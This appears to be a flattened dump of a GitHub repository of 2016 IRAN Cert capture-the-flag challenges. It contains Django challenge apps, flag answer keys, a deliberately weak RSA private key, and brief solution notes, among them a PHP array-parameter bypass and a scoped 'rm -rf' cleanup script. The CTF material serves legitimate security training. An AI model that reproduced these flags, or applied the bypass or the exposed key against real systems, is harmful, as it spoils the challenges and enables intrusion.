https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_easy_math_40pt/views.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_prime_sum_30pt/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_prime_sum_30pt/__init__.py
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_prime_sum_30pt/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_prime_sum_30pt/__init__.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_prime_sum_30pt/models.py:
--------------------------------------------------------------------------------
1 | from django.db import models
2 | from django.contrib.auth.models import User
3 |
4 |
5 | class SessionChallenge_prime_sum(models.Model):
6 | user = models.OneToOneField(User)
7 | expiration_date = models.DateTimeField()
8 | prime_number = models.IntegerField()
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_prime_sum_30pt/models.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_prime_sum_30pt/models.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_prime_sum_30pt/views.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_prime_sum_30pt/views.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_simple_post_20pt/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_simple_post_20pt/__init__.py
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_simple_post_20pt/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_simple_post_20pt/__init__.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_simple_post_20pt/models.py:
--------------------------------------------------------------------------------
1 | from django.db import models
2 | from django.contrib.auth.models import User
3 |
4 |
5 | class SessionChallenge_simple_post(models.Model):
6 | user = models.OneToOneField(User)
7 | expiration_date = models.DateTimeField()
8 | random_number = models.IntegerField()
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_simple_post_20pt/models.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_simple_post_20pt/models.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_simple_post_20pt/views.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_simple_post_20pt/views.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/db.sqlite3:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/db.sqlite3
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/manage.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | import os
3 | import sys
4 |
5 | if __name__ == "__main__":
6 | os.environ.setdefault("DJANGO_SETTINGS_MODULE", "project.settings")
7 |
8 | from django.core.management import execute_from_command_line
9 |
10 | execute_from_command_line(sys.argv)
11 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/project/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/project/__init__.py
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/project/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/project/__init__.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/project/settings.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/project/settings.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/project/urls.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/project/urls.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/project/wsgi.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/project/wsgi.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Reverse/30pt- decompile me/Sources/DecompileIt.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Reverse/30pt- decompile me/Sources/DecompileIt.jar
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Reverse/30pt- decompile me/docompile me/DecompileIt.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Reverse/30pt- decompile me/docompile me/DecompileIt.jar
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Reverse/30pt- useless/info.txt:
--------------------------------------------------------------------------------
1 | APACTF{345Y_with_Debugging_right?}
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Reverse/30pt- useless/useless/binary:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Reverse/30pt- useless/useless/binary
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Steg/40pt- funny messaging/info.txt:
--------------------------------------------------------------------------------
1 | Flag:
2 | APACTF{If_u_think_ab0ut_it_it_w4s_4_little_funny}
3 |
4 |
5 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Steg/50pt- hidden secret/Resources/pass.txt:
--------------------------------------------------------------------------------
1 | remember, I put the 4-digit word that we always use when we share stuff, for the password.
2 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Steg/50pt- hidden secret/Resources/sample.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Steg/50pt- hidden secret/Resources/sample.jpg
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Steg/50pt- hidden secret/Resources/sample.wav:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Steg/50pt- hidden secret/Resources/sample.wav
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Steg/50pt- hidden secret/Resources/secret.txt:
--------------------------------------------------------------------------------
1 | APACTF{Always_f!rst_ch3ck_Steghide_for_this_kind_of_t45ks}
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Steg/50pt- hidden secret/hidden secret/file:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Steg/50pt- hidden secret/hidden secret/file
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/flag.txt:
--------------------------------------------------------------------------------
1 | APACTF{DJANGO_DEBUG_!S_D4NGEROUS}
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/.idea/dataSources.local.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/.idea/encodings.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/.idea/misc.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/.idea/modules.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/.idea/scopes/scope_settings.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/.idea/vcs.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/app/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/app/__init__.py
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/app/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/app/__init__.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/app/admin.py:
--------------------------------------------------------------------------------
1 | from django.contrib import admin
2 |
3 | # Register your models here.
4 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/app/admin.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/app/admin.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/app/models.py:
--------------------------------------------------------------------------------
1 | from django.db import models
2 |
3 |
4 | class flag(models.Model):
5 | name = models.CharField(max_length=100)
6 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/app/models.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/app/models.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/app/tests.py:
--------------------------------------------------------------------------------
1 | from django.test import TestCase
2 |
3 | # Create your tests here.
4 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/app/views.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/app/views.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/db.sqlite3:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/db.sqlite3
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/manage.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | import os
3 | import sys
4 |
5 | if __name__ == "__main__":
6 | os.environ.setdefault("DJANGO_SETTINGS_MODULE", "project.settings")
7 |
8 | from django.core.management import execute_from_command_line
9 |
10 | execute_from_command_line(sys.argv)
11 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/project/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/project/__init__.py
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/project/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/project/__init__.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/project/settings.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/project/settings.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/project/urls.py:
--------------------------------------------------------------------------------
1 | from django.conf.urls import include, url, patterns
2 | from django.contrib import admin
3 |
4 | urlpatterns = patterns('',
5 | #url(r'^admin/', include(admin.site.urls)),
6 | url(r'^$', 'app.views.index'),
7 | url(r'^index$', 'app.views.index'),
8 | )
9 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/project/urls.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/project/urls.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/project/wsgi.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/project/wsgi.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Web/40pt- make it collide/info.txt:
--------------------------------------------------------------------------------
1 | Flag:
2 | APA{First_l00k_for_7h3_bug5}
3 |
4 | Soloution:
5 | ?pass1[]=testing&pass2[]=testing
6 |
7 | Points:
8 | 25pt
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Web/40pt- modern website/Sources/Untitled-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Web/40pt- modern website/Sources/Untitled-1.png
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Web/40pt- modern website/Sources/db-creds.inc:
--------------------------------------------------------------------------------
1 |
10 |
11 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/2- Medium/Crypto/70pt- rsa2/Solution/out.pub:
--------------------------------------------------------------------------------
1 | -----BEGIN PUBLIC KEY-----
2 | MDwwDQYJKoZIhvcNAQEBBQADKwAwKAIhAKY1BuFcaOPuJH2iXISpD2b56bZm0Z+l
3 | LmZho3BRb3rrAgMBAAE=
4 | -----END PUBLIC KEY-----
5 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/2- Medium/Crypto/70pt- rsa2/create.md:
--------------------------------------------------------------------------------
1 | openssl genrsa -out out.key 256
2 | openssl rsa -in out.key -pubout > out.pub
3 | echo "APACTF{T0o0_w3e3e3k}" | openssl rsautl -encrypt -pubin -inkey out.pub > msg.enc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/2- Medium/Crypto/70pt- rsa2/out.key:
--------------------------------------------------------------------------------
1 | -----BEGIN RSA PRIVATE KEY-----
2 | MIGpAgEAAiEApjUG4Vxo4+4kfaJchKkPZvnptmbRn6UuZmGjcFFveusCAwEAAQIg
3 | Lv21CUhYO4Eb/g1GfRdTTARZVWXtOk/5TdlWukpLkCkCEQDSMIwZet1PmmYjIbEq
4 | yX4nAhEAym5+BkmWyGxriCASSFkbnQIQMVRtfQll6WnOMM6WevlBHwIQeANFx+h8
5 | 8loE7nFFJYteqQIQVaadc1yxQ2artd1hrS2u8g==
6 | -----END RSA PRIVATE KEY-----
7 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/2- Medium/Crypto/70pt- rsa2/rsa2/msg.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/2- Medium/Crypto/70pt- rsa2/rsa2/msg.enc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/2- Medium/Crypto/70pt- rsa2/rsa2/out.pub:
--------------------------------------------------------------------------------
1 | -----BEGIN PUBLIC KEY-----
2 | MDwwDQYJKoZIhvcNAQEBBQADKwAwKAIhAKY1BuFcaOPuJH2iXISpD2b56bZm0Z+l
3 | LmZho3BRb3rrAgMBAAE=
4 | -----END PUBLIC KEY-----
5 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/2- Medium/Misc/80pt- catch me if you can/Sources/!pd.nfo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/2- Medium/Misc/80pt- catch me if you can/Sources/!pd.nfo
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/2- Medium/Misc/80pt- catch me if you can/Sources/Click.598-1395.10.19_p30download.com/!pd.nfo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/2- Medium/Misc/80pt- catch me if you can/Sources/Click.598-1395.10.19_p30download.com/!pd.nfo
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/2- Medium/Misc/80pt- catch me if you can/Sources/Click.598-1395.10.19_p30download.com/pd.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/2- Medium/Misc/80pt- catch me if you can/Sources/Click.598-1395.10.19_p30download.com/pd.jpg
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/2- Medium/Misc/80pt- catch me if you can/Sources/Click.598-1395.10.19_p30download.com/www.p30download.com.url:
--------------------------------------------------------------------------------
1 | [DEFAULT]
2 | BASEURL=http://www.p30download.com/
3 | [InternetShortcut]
4 | URL=http://www.p30download.com/
5 | Modified=A07A87911284C5018E
6 | IDList=
7 | IconFile=http://p30download.com/favicon.ico
8 | IconIndex=1
9 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/2- Medium/Misc/80pt- catch me if you can/Sources/flag.txt:
--------------------------------------------------------------------------------
1 | Nice job. Flag is APACTF{Y0U_successfully_Cr4ck3d_ME}
2 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/2- Medium/Misc/80pt- catch me if you can/Sources/pd.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/2- Medium/Misc/80pt- catch me if you can/Sources/pd.jpg
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/2- Medium/Misc/80pt- catch me if you can/Sources/www.p30download.com.url:
--------------------------------------------------------------------------------
1 | [DEFAULT]
2 | BASEURL=http://www.p30download.com/
3 | [InternetShortcut]
4 | URL=http://www.p30download.com/
5 | Modified=A07A87911284C5018E
6 | IDList=
7 | IconFile=http://p30download.com/favicon.ico
8 | IconIndex=1
9 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/2- Medium/Misc/80pt- catch me if you can/catch me if you can/flag.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/2- Medium/Misc/80pt- catch me if you can/catch me if you can/flag.zip
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/2- Medium/Misc/80pt- crypted png/crypted png/flag_encrypted.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/2- Medium/Misc/80pt- crypted png/crypted png/flag_encrypted.png
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/2- Medium/Reverse/50pt- can you crack this/can you crack this/crackme:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/2- Medium/Reverse/50pt- can you crack this/can you crack this/crackme
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/2- Medium/Reverse/50pt- can you crack this/crackme:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/2- Medium/Reverse/50pt- can you crack this/crackme
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/2- Medium/Reverse/50pt- can you crack this/info.txt:
--------------------------------------------------------------------------------
1 | Flag:
2 | APACTF{jnhFClg2sv3uaBBxs}
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/2- Medium/Reverse/60pt- password validator/Resources/clear.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | from os import popen
3 | from os import mkdir
4 | from sys import argv
5 | N = int(argv[1])
6 |
7 | popen('rm -rf team*')
8 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/2- Medium/Reverse/60pt- password validator/Resources/rev:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/2- Medium/Reverse/60pt- password validator/Resources/rev
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/2- Medium/Reverse/60pt- password validator/info.txt:
--------------------------------------------------------------------------------
1 | Flag:
2 | APACTF{Ok4y_Chi3f_Ug0t_me_again}
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/2- Medium/Reverse/60pt- password validator/password validator/rev:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/2- Medium/Reverse/60pt- password validator/password validator/rev
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/2- Medium/Reverse/60pt- password validator/rev:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/2- Medium/Reverse/60pt- password validator/rev
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/2- Medium/Steg/50pt- tricky but easy/flag.txt:
--------------------------------------------------------------------------------
1 | Nice job, Flag is APACTF{L00king_Good_w!th_outguess}
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/2- Medium/Steg/50pt- tricky but easy/info.txt:
--------------------------------------------------------------------------------
1 | Flag:
2 | APACTF{L00king_Good_w!th_outguess}
3 |
4 |
5 | Description:
6 | Try this one, I hide another flag. I'm pretty sure you can't find this one that easily.
7 |
8 |
9 | Solution:
10 | outguess -r hidden.jpg out.txt
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/2- Medium/Steg/50pt- tricky but easy/sample.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/2- Medium/Steg/50pt- tricky but easy/sample.jpg
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/2- Medium/Steg/50pt- tricky but easy/tricky but easy/hidden.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/2- Medium/Steg/50pt- tricky but easy/tricky but easy/hidden.jpg
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/2- Medium/Web/50pt- i like serials/Sources/flag.php:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/2- Medium/Web/50pt- i like serials/info.txt:
--------------------------------------------------------------------------------
1 | Description:
2 | Simple php website, go and visit it.
3 |
4 | Flag:
5 | APACTF{!7_couldnt_b3_Easi3r_than_7h!5}
6 |
7 | Solution:
8 | create and serialize a profile with username = 'admin' value
9 | use solve.php
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/2- Medium/Web/70pt- old php/flag.php:
--------------------------------------------------------------------------------
1 |
4 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/css/font-awesome/fonts/FontAwesome.otf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/css/font-awesome/fonts/FontAwesome.otf
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/favicon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/favicon.png
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-black-webfont.eot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-black-webfont.eot
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-black-webfont.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-black-webfont.ttf
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-black-webfont.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-black-webfont.woff
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-black-webfont.woff2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-black-webfont.woff2
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-blackitalic-webfont.eot:
--------------------------------------------------------------------------------
